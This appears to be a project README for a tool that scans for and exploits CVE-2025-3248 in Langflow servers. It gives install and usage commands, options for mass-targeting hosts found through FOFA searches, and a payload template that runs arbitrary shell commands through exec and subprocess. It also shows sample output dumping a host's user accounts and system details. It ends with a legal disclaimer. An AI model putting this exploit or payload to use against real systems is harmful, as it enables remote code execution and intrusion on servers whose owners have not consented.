
Um scanner de vulnerabilidades para CVE-2025-3248 em aplicativos Langflow. 用于扫描 Langflow 应用中 CVE-2025-3248 漏洞的工具。
中文 | Inglês
Um scanner de vulnerabilidades para CVE-2025-3248 em aplicações Langflow.
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
# After you finish editing
mv .env.example .env
python main.py -t https://target.com
python main.py --fofa-email [email protected] --fofa-key your_api_key
-t, --target: URL do alvo para escanear--fofa-email: Email da API FOFA--fofa-key: Chave da API FOFA--fofa-query: Consulta de pesquisa FOFA (padrão: 'app="LOGSPACE-LangFlow"')--country: Filtre resultados por código de país (ex.: CN, US)--max-pages: Número máximo de páginas FOFA a recuperar (padrão: 5)--page-size: Resultados por página (padrão: 100)--timeout: Tempo limite de requisição em segundos (padrão: 10)--no-verify: Desabilite a verificação SSL--threads: Número de threads para escaneamento concorrente (padrão: 5)-f, --file: Arquivo Python personalizado para usar como payloadVocê pode criar payloads personalizados criando um arquivo Python:
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
pass
Em seguida, use-o com:
python main.py -t https://target.com -f your_payload.py
[+] User Accounts:
root UID:0 GID:0 Home:/root Shell:/bin/bash
daemon UID:1 GID:1 Home:/usr/sbin Shell:/usr/sbin/nologin
bin UID:2 GID:2 Home:/bin Shell:/usr/sbin/nologin
sys UID:3 GID:3 Home:/dev Shell:/usr/sbin/nologin
sync UID:4 GID:65534 Home:/bin Shell:/bin/sync
games UID:5 GID:60 Home:/usr/games Shell:/usr/sbin/nologin
man UID:6 GID:12 Home:/var/cache/man Shell:/usr/sbin/nologin
lp UID:7 GID:7 Home:/var/spool/lpd Shell:/usr/sbin/nologin
mail UID:8 GID:8 Home:/var/mail Shell:/usr/sbin/nologin
news UID:9 GID:9 Home:/var/spool/news Shell:/usr/sbin/nologin
uucp UID:10 GID:10 Home:/var/spool/uucp Shell:/usr/sbin/nologin
proxy UID:13 GID:13 Home:/bin Shell:/usr/sbin/nologin
www-data UID:33 GID:33 Home:/var/www Shell:/usr/sbin/nologin
backup UID:34 GID:34 Home:/var/backups Shell:/usr/sbin/nologin
list UID:38 GID:38 Home:/var/list Shell:/usr/sbin/nologin
irc UID:39 GID:39 Home:/run/ircd Shell:/usr/sbin/nologin
_apt UID:42 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
nobody UID:65534 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
user UID:1000 GID:0 Home:/app/data Shell:/bin/sh
[+] System Details:
Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux
⚠️ Aviso Legal Esta ferramenta é apenas para fins legais. Foi projetada para fins educacionais, testes de segurança internos em empresas ou uso em ambientes autorizados. É estritamente proibido usar esta ferramenta em qualquer sistema, rede ou dispositivo não autorizado, caso contrário, pode violar leis e regulamentos relevantes.
Os usuários devem assumir todas as responsabilidades legais por suas ações. O autor e os contribuidores não são responsáveis por quaisquer perdas, vazamento de dados ou consequências legais causadas pelo uso inadequado desta ferramenta.
⚠️ Não use para ataques ilegais. Não tente implantar ou executar esta ferramenta em sistemas não autorizados.